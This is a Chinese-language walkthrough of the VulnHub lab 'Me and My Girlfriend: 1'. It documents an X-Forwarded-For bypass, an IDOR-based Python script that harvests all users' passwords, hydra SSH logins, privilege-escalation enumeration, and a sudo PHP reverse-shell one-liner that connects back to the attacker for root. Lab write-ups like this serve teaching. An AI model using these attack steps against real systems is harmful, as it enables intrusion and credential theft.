Me-and-My-Girlfriend-1

Me-and-My-Girlfriend-1

目录

• Me-and-My-Girlfriend-1
• 1 信息收集
  • 1.1 端口扫描
  • 1.2 后台目录扫描
    • 1.2.1 目录分析
• 2 GetShell
  • 2.1 利用收集的信息尝试ssh登录目标主机
  • 2.2 成功登录
• 3 提权
  • 3.1 尝试提权
  • 3.2 收集当前系统信息
  • 3.3 sudo php提权

下载地址：Me and My Girlfriend: 1 ~ VulnHub

1 信息收集

1.1 端口扫描

┌──(kali㉿kali)-[~]
└─$ nmap -sV -T4 -p - 192.168.0.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-07 19:54 CST
Nmap scan report for 192.168.0.3
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1.2 后台目录扫描

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.0.3/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

[20:43:35] Starting:
[20:43:35] 301 -  308B  - /misc  ->  http://192.168.0.3/misc/
[20:43:38] 301 -  310B  - /config  ->  http://192.168.0.3/config/
[20:56:50] 200 -  120B  - /index.php
[20:56:58] 200 -   32B  - /robots.txt
[20:47:35] 403 -  291B  - /server-status

Task Completed

1.2.1 目录分析

1. 访问http://192.168.0.3/发现有IP限制，查看页面代码信息，发现需要利用X-Forwarded-For Header绕过

   

2. 火狐下载插件：X-Forwarded-For Header，并配置IP地址为：127.0.0.1，请求头选择X-Forwarded-For

   

3. 利用X-Forwarded-For Header插件成功访问到目标网站：http://192.168.0.3/?page=index

   

4. 在目标网站上注册test用户

   

5. 成功登录后台：http://192.168.0.3/index.php?page=dashboard

   

6. 在http://192.168.0.3/index.php?page=profile&user_id=12页面尝试水平越权，将user_id=12改为user_id=1

   

   

   # 通过水平越权得到注册的用户信息如下：
   Eweuh Tandingan
   eweuhtandingan
   skuyatuh
   

7. 编写脚本尝试获取所有用户的账号密码：

   import requests, re
   
   def get_user_pass(uid):
       uid = uid
       t_url = 'http://192.168.0.3/index.php?page=profile&user_id=%s' % uid
       t_cookie = {
           "PHPSESSID":"ua2kg2n1inkvdbdcohitotsgg5"
       }
       t_headers = {"X-Forwarded-For":"127.0.0.1"}
       getreq = requests.get(url=t_url, cookies=t_cookie,headers=t_headers).text
       # match name
       getname = re.search( "id=\"name\" value=\"(.*?)\">",getreq).group(1)
       # match username
       getusername = re.search( "id=\"username\" value=\"(.*?)\">",getreq).group(1)
       # match passwd
       getpasswd = re.search( "id=\"password\" value=\"(.*?)\">",getreq).group(1)
       return getname,getusername,getpasswd
   if __name__ == '__main__':
       for i in range(20):
           getname,getusername,getpasswd = get_user_pass(i)
           if getname:
               print("%s:%s"%(getusername,getpasswd))
   

8. 得到以下结果：

   eweuhtandingan:skuyatuh
   aingmaung:qwerty!!!
   sundatea:indONEsia
   sedihaingmah:cedihhihihi
   alice:4lic3
   abdikasepak:dorrrrr
   test:Admin123
   

9. http://192.168.0.3/robots.txt

   

10. http://192.168.0.3/heyhoo.txt

    

2 GetShell

2.1 利用收集的信息尝试ssh登录目标主机

# hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -C user-pass ssh://192.168.0.3

# 得到：ssh登录账号与密码
alice:4lic3

• -C： FILE 文件格式为 "login:pass"

2.2 成功登录

# 获得第一个flag
alice@gfriEND:~$ cat .my_secret/flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

3 提权

3.1 尝试提权

sudo su -提权失败

3.2 收集当前系统信息

1. 查看/etc/passwd

   root:x:0:0:root:/root:/bin/bash
   daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
   bin:x:2:2:bin:/bin:/usr/sbin/nologin
   sys:x:3:3:sys:/dev:/usr/sbin/nologin
   sync:x:4:65534:sync:/bin:/bin/sync
   games:x:5:60:games:/usr/games:/usr/sbin/nologin
   man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
   lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
   mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
   news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
   uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
   proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
   www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
   backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
   list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
   irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
   gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
   nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
   libuuid:x:100:101::/var/lib/libuuid:
   syslog:x:101:104::/home/syslog:/bin/false
   messagebus:x:102:106::/var/run/dbus:/bin/false
   landscape:x:103:109::/var/lib/landscape:/bin/false
   alice:x:1000:1001:Alice Geulis,1337,+62,+62:/home/alice:/bin/bash
   eweuhtandingan:x:1001:1002:,,,:/home/eweuhtandingan:/bin/bash
   aingmaung:x:1002:1003:,,,:/home/aingmaung:/bin/bash
   sundatea:x:1003:1004:,,,:/home/sundatea:/bin/bash
   sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
   mysql:x:105:113:MySQL Server,,,:/var/lib/mysql:/bin/false
   

2. SUID提权：没啥可利用的

   alice@gfriEND:~$ find / -perm -u=s 2>/dev/null
   /bin/ping6
   /bin/ping
   /bin/umount
   /bin/mount
   /bin/su
   /bin/fusermount
   /usr/bin/chsh
   /usr/bin/gpasswd
   /usr/bin/mtr
   /usr/bin/pkexec
   /usr/bin/at
   /usr/bin/traceroute6.iputils
   /usr/bin/passwd
   /usr/bin/chfn
   /usr/bin/newgrp
   /usr/bin/sudo
   /usr/sbin/uuidd
   /usr/sbin/pppd
   /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   /usr/lib/eject/dmcrypt-get-device
   /usr/lib/openssh/ssh-keysign
   /usr/lib/policykit-1/polkit-agent-helper-1
   

3. 查看当前系统中的用户所创建的文件：没啥东东

   alice@gfriEND:~$ find / -user 1000  2>/dev/null
   /home/alice
   /home/alice/.bashrc
   /home/alice/.cache
   /home/alice/.cache/motd.legal-displayed
   /home/alice/.bash_logout
   /home/alice/.bash_history
   /home/alice/.profile
   /home/alice/.my_secret
   /home/alice/.my_secret/my_notes.txt
   alice@gfriEND:~$ find / -user 1001 2>/dev/null
   /home/eweuhtandingan
   /home/eweuhtandingan/.bashrc
   /home/eweuhtandingan/.bash_logout
   /home/eweuhtandingan/.profile
   alice@gfriEND:~$ find / -user 1002 2>/dev/null
   /home/aingmaung
   /home/aingmaung/.bashrc
   /home/aingmaung/.bash_logout
   /home/aingmaung/.profile
   alice@gfriEND:~$ find / -user 1003 2>/dev/null
   /home/sundatea
   /home/sundatea/.bashrc
   /home/sundatea/.bash_logout
   /home/sundatea/.profile
   alice@gfriEND:~$
   

4. 查找敏感文件

   alice@gfriEND:/var/www/html$ cat config/config.php
   <?php
   
       $conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp');
   alice@gfriEND:/var/www/html$
   

5. 查看当前alice用户是否拥有sudo权限

   alice@gfriEND:~$ sudo -l
   Matching Defaults entries for alice on gfriEND:
       env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
   
   User alice may run the following commands on gfriEND:
       (root) NOPASSWD: /usr/bin/php
   

3.3 sudo php提权

alice@gfriEND:~$ sudo php -r '$sock=fsockopen("192.168.0.2",2333);exec("/bin/bash -i <&3 >&3 2>&3");'
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 2333
listening on [any] 2333 ...
connect to [192.168.0.2] from (UNKNOWN) [192.168.0.3] 57734
root@gfriEND:~# cat flag2.txt 

  ________        __    ___________.__             ___________.__                ._.
 /  _____/  _____/  |_  \__    ___/|  |__   ____   \_   _____/|  | _____     ____| |
/   \  ___ /  _ \   __\   |    |   |  |  \_/ __ \   |    __)  |  | \__  \   / ___\ |
\    \_\  (  <_> )  |     |    |   |   Y  \  ___/   |     \   |  |__/ __ \_/ /_/  >|
 \______  /\____/|__|     |____|   |___|  /\___  >  \___  /   |____(____  /\___  /__
        \/                              \/     \/       \/              \//_____/ \/

Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)

Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73

Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
root@gfriEND:/root#